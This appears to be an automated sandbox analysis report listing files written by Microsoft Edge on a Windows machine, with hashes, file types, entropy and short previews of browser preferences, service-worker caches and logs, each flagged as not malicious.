SHA-256:	FED570847D240E3D6C49E7973403D61169779C08DF631829B50373D7EA00AC6E
SHA-512:	AD38C3570486DEE9BCB44D2AC08EB552799E29760AA19F3C53A204AC6F87E61C684718E70F180C34815C47108F392313DAF80B0EFB6F63E15CD4082E75FB7823
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377050730666443","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF45abf.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9861
Entropy (8bit):	5.1070370750413225
Encrypted:	false
SSDEEP:	192:st1kdp+swzKaFvrE9kDvTe8EbV+FGMQAwUNPxYJ:st1Q+scKCDpIbGJQOg
MD5:	B416A14104F920D8D3BC7C4098BD42F1
SHA1:	A3F7EB93714F0DBAD9EB8BEF63A64904F2C16C54
SHA-256:	FED570847D240E3D6C49E7973403D61169779C08DF631829B50373D7EA00AC6E
SHA-512:	AD38C3570486DEE9BCB44D2AC08EB552799E29760AA19F3C53A204AC6F87E61C684718E70F180C34815C47108F392313DAF80B0EFB6F63E15CD4082E75FB7823
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377050730666443","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4b022.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9861
Entropy (8bit):	5.1070370750413225
Encrypted:	false
SSDEEP:	192:st1kdp+swzKaFvrE9kDvTe8EbV+FGMQAwUNPxYJ:st1Q+scKCDpIbGJQOg
MD5:	B416A14104F920D8D3BC7C4098BD42F1
SHA1:	A3F7EB93714F0DBAD9EB8BEF63A64904F2C16C54
SHA-256:	FED570847D240E3D6C49E7973403D61169779C08DF631829B50373D7EA00AC6E
SHA-512:	AD38C3570486DEE9BCB44D2AC08EB552799E29760AA19F3C53A204AC6F87E61C684718E70F180C34815C47108F392313DAF80B0EFB6F63E15CD4082E75FB7823
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377050730666443","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25012
Entropy (8bit):	5.568391548041707
Encrypted:	false
SSDEEP:	768:LfMyIXWMgW5w55f4+18F1+UoAYDCx9Tuqh0VfUC9xbog/OVPplIJWHtrwXsrpTtR:LUjX9gWa55f71u1ja0qkW8ptR
MD5:	5C0A88FFBBB5C58DF7DF0EC66D470D60
SHA1:	9EF3C3F5F93B055E9637AC988ACE04CE9B392AEC
SHA-256:	0327CCC79A977AAEA6FF1AF837C68B4E6455298BEC950ECDDDD61BD9C4BCF1EE
SHA-512:	79301909E5C8F226A94A5DFDDCA3C6E0E19B97179A92649317D843317A11BA9B34521F6E47E77CE6EF3DB1819755DEBD5755E1A740BDC7BC3AA59D3C80AE36CB
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377050729938671","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377050729938671","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3ed01.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25012
Entropy (8bit):	5.568391548041707
Encrypted:	false
SSDEEP:	768:LfMyIXWMgW5w55f4+18F1+UoAYDCx9Tuqh0VfUC9xbog/OVPplIJWHtrwXsrpTtR:LUjX9gWa55f71u1ja0qkW8ptR
MD5:	5C0A88FFBBB5C58DF7DF0EC66D470D60
SHA1:	9EF3C3F5F93B055E9637AC988ACE04CE9B392AEC
SHA-256:	0327CCC79A977AAEA6FF1AF837C68B4E6455298BEC950ECDDDD61BD9C4BCF1EE
SHA-512:	79301909E5C8F226A94A5DFDDCA3C6E0E19B97179A92649317D843317A11BA9B34521F6E47E77CE6EF3DB1819755DEBD5755E1A740BDC7BC3AA59D3C80AE36CB
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377050729938671","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377050729938671","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2294
Entropy (8bit):	5.836213600233517
Encrypted:	false
SSDEEP:	48:F2emqtrdDjZfBxXrdYxqrdDjEBtrdmEBg:F1mqtxDjZHxYxqxDjixmV
MD5:	B4F84F5D30F923E098FC688A29976789
SHA1:	225BEA829FB3F7CA6C2A3459918E11075E8ED973
SHA-256:	05B7EA0C0E8AD413DEF35331B52FECE15959DB04E13DA62E43D8655F7AD5A0CD
SHA-512:	03C0F4432736CCAD526B79D2B07CE39CEFDAD5413B1AE2CB68B10886BC8114589ABC5D6A737CA64ADCFC8CD887449F52C1F39D9F5713AE1A7160E482CD31C232
Malicious:	false
Preview:	....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2z7.*m................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true .(.0.8.......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x..................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enable

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	303
Entropy (8bit):	5.089706657286209
Encrypted:	false
SSDEEP:	6:HApnAX9s1N723oH+TcwtE/a252KLlVApt89+q2PN723oH+TcwtE/a2ZIFUv:gZoMaYeb8xLo2+vVaYeb8J2FUv
MD5:	4B3662FFE117B93019BF8824856677F9
SHA1:	A37237F47E38EEAC800D47CA8141E4F43E6DD6BE
SHA-256:	B046A9290D76C1E47B781010096FA8456571EDD06A77C8B6E42D7EA3B02995D2
SHA-512:	DFD48B2F3BE123A38BB2BE3DBCFC3AD467E4F0B5C6CA220217F29989214FF64A07EA318282588001DC33F87E110F160FF79CDDBB9B640E04B24C9C41535484D7
Malicious:	false
Preview:	2024/11/25-18:25:50.029 1e2c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/11/25-18:25:50.044 1e2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	114376
Entropy (8bit):	5.577484373375064
Encrypted:	false
SSDEEP:	1536:AU906yxPXfOxr1lhCe1nL/rmL/rBZXECjAWNKPt3dfvYgQDKL:d9LyxPXfOxr1lMe1nL/CL/TXEmsvFZ
MD5:	27E323EC1D3B9DF2E9C581BA4CF92C07
SHA1:	A5A2206756B5602E3CD000380918AE633ACF8280
SHA-256:	19C1F9783E4CCDAB8904205248A59B2FDE84023F1C71F0EB7F81076ECB167F16
SHA-512:	8BB767E0C1BCFCFD37F7FD71A28C92DFB6079CE728B6B4306FBBC998CA6052DD2A738EFD0A6B1EA017AFCF9BB20F0E1E6AC9536F3DB193F24B18A7698566B4E6
Malicious:	false
Preview:	0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this\|\|new Function("return this")()}catch(e){if("object"==typeof window

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	188881
Entropy (8bit):	6.386348691060265
Encrypted:	false
SSDEEP:	3072:az7aZT4tXNVzwghoXxdL/jeMhxcpW6IuIjveXRpF+:YzwHXbL/aGcWShe
MD5:	6345C7E43D61D786D403C11C2EEF3956
SHA1:	7C50E56FD608EF2F7F6677AD45540F3E3692EB1D
SHA-256:	0DFA71582BECE4D00E86A3EF0F511C1D6D82995B09FC8FE8B8A142878F355DF2
SHA-512:	1E782866AF8C1474625677FC57275DDB00FDCE559D89042D12BF00E96F22D65CF1AD3A6AAB0308FB442EFDE18D259084F700B7571135EF9E2DC93B0AC9546B83
Malicious:	false
Preview:	0\r..m..........rSG.....0...../...............R......yTx........,T.8..`,.....L`.....,T...`......L`......Rc..5e....exports...Rc........module....Rc.s.R....define....Rb.5~.....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...\|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H......q.Q.m..~i.b...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true..a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....zY...,T.`.`z.....L`..........a............a.........Dr8................/....-.......}....4..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.565412423760729
Encrypted:	false
SSDEEP:	3:jTio0jXl/ly/l9/lxE0tlla/l5Uh:6o0zmO0guh
MD5:	76C6784617A9447AF0A53953D0E1F3AE
SHA1:	D35D4E11E6B1804C7D7E6B25A3BA86DC4EECFCF0
SHA-256:	F8493D782DB610CCA7CC2D157244908E02BC0452898347F0390AB7FAE3FE56DC
SHA-512:	4AD477454ECFFCF08A247537539EB53500DB0308C0945437F541FE1550846FD7E1D25CE342B393455D43EDB1111B19F798E49282DEA8CCAEA8036184AF408FEE
Malicious:	false
Preview:	@....6..oy retne.........................X....,................Fn'V[./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.565412423760729
Encrypted:	false
SSDEEP:	3:jTio0jXl/ly/l9/lxE0tlla/l5Uh:6o0zmO0guh
MD5:	76C6784617A9447AF0A53953D0E1F3AE
SHA1:	D35D4E11E6B1804C7D7E6B25A3BA86DC4EECFCF0
SHA-256:	F8493D782DB610CCA7CC2D157244908E02BC0452898347F0390AB7FAE3FE56DC
SHA-512:	4AD477454ECFFCF08A247537539EB53500DB0308C0945437F541FE1550846FD7E1D25CE342B393455D43EDB1111B19F798E49282DEA8CCAEA8036184AF408FEE
Malicious:	false
Preview:	@....6..oy retne.........................X....,................Fn'V[./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF43ef9.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.565412423760729
Encrypted:	false
SSDEEP:	3:jTio0jXl/ly/l9/lxE0tlla/l5Uh:6o0zmO0guh
MD5:	76C6784617A9447AF0A53953D0E1F3AE
SHA1:	D35D4E11E6B1804C7D7E6B25A3BA86DC4EECFCF0
SHA-256:	F8493D782DB610CCA7CC2D157244908E02BC0452898347F0390AB7FAE3FE56DC
SHA-512:	4AD477454ECFFCF08A247537539EB53500DB0308C0945437F541FE1550846FD7E1D25CE342B393455D43EDB1111B19F798E49282DEA8CCAEA8036184AF408FEE
Malicious:	false
Preview:	@....6..oy retne.........................X....,................Fn'V[./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	6821
Entropy (8bit):	3.3874851767349603
Encrypted:	false
SSDEEP:	192:HozE0jX10MtVH9Xp+f1+iV5SLl9iSrY4shC:HcjX1/9Xp+9+45SLl9iSr3sh
MD5:	47B19AF73D8925C4A95C8CBBE68967F9
SHA1:	FDB6455916FAD8E575314EB850ACB581712778E3
SHA-256:	2BB0017C283A411A388B286E9E4F5AC949FF226E4869DCFA9E8CEABAF28A7342
SHA-512:	541A7F0B5BD87203F09378C5930F55A184E8E05118032501876FF5AD41A0ABEC515B8931170C8E715F451C763063FC43DE9C170AEEE5CE5F7E7F0CDFB00CA02F
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f................7.?b................next-map-id.1.Cnamespace-275c4cb9_af9b_493d_bf46_86968bc2e830-https://ntp.msn.com/.0V.e................V.e................V.e....................`................map-0-shd_sweeper.2{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.e.t.q.o.h.p.a.d.c.,.p.r.g.-.i.n.f.o.p.-.a.d.s.-.d.l.-.t.1.,.p.r.g.-.a.d.-.c.-.s.t.a.b.-.b.n.,.p.r.g.-.c.-.s.t.a.b.-.b.n.,.i.c.r.s.c.a.l.l.-.s.p.-.c.t.l.,.p.r.g.-.1.s.w.-.s.a.e.d.g.e._.i.t.4.c.1.,.p.r.g.-.1.s.w.-.s.a.-.m.a.i.p.r.o.f.i.l.e._.t.1.,.p.r.g.-.1.s.w.-.s.a.e.n.d.n.n.o.f.e.v.4.t.,.p.r.g.-.1.s.w.-.s.a.l.3.u.i.c.d.b.f.1.,.p.r.g.-.1.s.w.-.a.b.r.t.p.g.-.r.,.p.r.g.-.1.s.w.-.r.e.v._.a.b.r.t.p.g.,.p.r.g.-.1.s.w.-.t.r.d.i.s.c.l.o.2.,.p.r.g.-.1.s.w.-.t.r.d.i.s.c.l.o.,.p.r.g.-.1.s.w.-.t.m.u.i.d.s.y.n.c.r.f.w.o.e.r.r.,.p.r.g.-.1.s.w.-.r.e.f.r.e.s.h.p.,.p

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	325
Entropy (8bit):	5.149878647978356
Encrypted:	false
SSDEEP:	6:HApMLoB0AVq2PN723oH+TcwtrQMxIFUt8YApML2gZmw+YApMLJUNAIkwON723oHs:gooB5VvVaYebCFUt87o2g/+7oJXI5Oan
MD5:	7716C28EB300BD56ED617844C9F3473B
SHA1:	F2F9B1BD8FA9BA16D27E3148EA63BD34DC4C1085
SHA-256:	FF2AD22C90F10069F6541BE5E35AD4CEC08C24D0CD60BCDD7562BDABD7E3F981
SHA-512:	95F0DD31CCE063B5FD764094C502349A183C050CEA2C085874E72243EC4885D0B65C1A3C2368F030BC7FCE94673C85B68273D9E1F37F918FF9D49B6CA073E832
Malicious:	false
Preview:	2024/11/25-18:25:31.636 d34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/25-18:25:31.641 d34 Recovering log #3.2024/11/25-18:25:31.644 d34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	325
Entropy (8bit):	5.149878647978356
Encrypted:	false
SSDEEP:	6:HApMLoB0AVq2PN723oH+TcwtrQMxIFUt8YApML2gZmw+YApMLJUNAIkwON723oHs:gooB5VvVaYebCFUt87o2g/+7oJXI5Oan
MD5:	7716C28EB300BD56ED617844C9F3473B
SHA1:	F2F9B1BD8FA9BA16D27E3148EA63BD34DC4C1085
SHA-256:	FF2AD22C90F10069F6541BE5E35AD4CEC08C24D0CD60BCDD7562BDABD7E3F981
SHA-512:	95F0DD31CCE063B5FD764094C502349A183C050CEA2C085874E72243EC4885D0B65C1A3C2368F030BC7FCE94673C85B68273D9E1F37F918FF9D49B6CA073E832
Malicious:	false
Preview:	2024/11/25-18:25:31.636 d34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/25-18:25:31.641 d34 Recovering log #3.2024/11/25-18:25:31.644 d34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13377050732443437

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1443
Entropy (8bit):	3.8275413789597965
Encrypted:	false
SSDEEP:	24:3ipEl/5tREGPGFpsAF4unx8tLp3X2amEtG1ChqMTU0grFIRQKkOAM4:33nRPPGFzFqLp2FEkChjvunHOp
MD5:	8CDCC4AEE0AE30718E3E61BF46C91038
SHA1:	EFE1F0AFFBA214AE78BD17CFF66E4B27BC71BF76
SHA-256:	43F82C94EE6D1F5A43A18228B0B6E0C0F02B0532E3E512097D7FA9342A3D844C
SHA-512:	60E2FB7A10549316266EFD8C3834FAA6ABDCB79E4F233E6249B4BC3D7F117853EC6B9265D701292AE1C36847620F80EC9A0B32C2EEC83B0B85E957D9DEB0E951
Malicious:	false
Preview:	SNSS..........x..............x......"...x..............x..........x..........x..........x....!.....x..................................x...x1..,......x$...275c4cb9_af9b_493d_bf46_86968bc2e830......x..........x....x.-...........x......x..........................x....................5..0......x&...{46F3A197-DB49-410A-81B3-94975C835573}........x.............x..........................x..............x........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x............'.......'.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.44194574462308833
Encrypted:	false
SSDEEP:	12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
MD5:	B35F740AA7FFEA282E525838EABFE0A6
SHA1:	A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
SHA-256:	5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
SHA-512:	05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	353
Entropy (8bit):	5.13462461946699
Encrypted:	false
SSDEEP:	6:HApTSVq2PN723oH+Tcwt7Uh2ghZIFUt8YAp0gZmw+YApDIkwON723oH+Tcwt7Uh9:gsVvVaYebIhHh2FUt87Sg/+7xI5OaYeQ
MD5:	EF6369664AC828777230B59B2F7F9450
SHA1:	F48CABFD3133D9C2EC06E14E667A1157FBC12B9D
SHA-256:	4794687E0FCD88B1E05862FA35EF5E59597D15E3AFA5650093CE6587CE84D612
SHA-512:	78A255FC45DBDA6F5A0B675A3FC655A29E9668D4D02DC05FD67182103016AF2502FCC0B0320A8D7DE3C1B9CC67970596705B643D96D93A09F0B9CAE181E24FF8
Malicious:	false
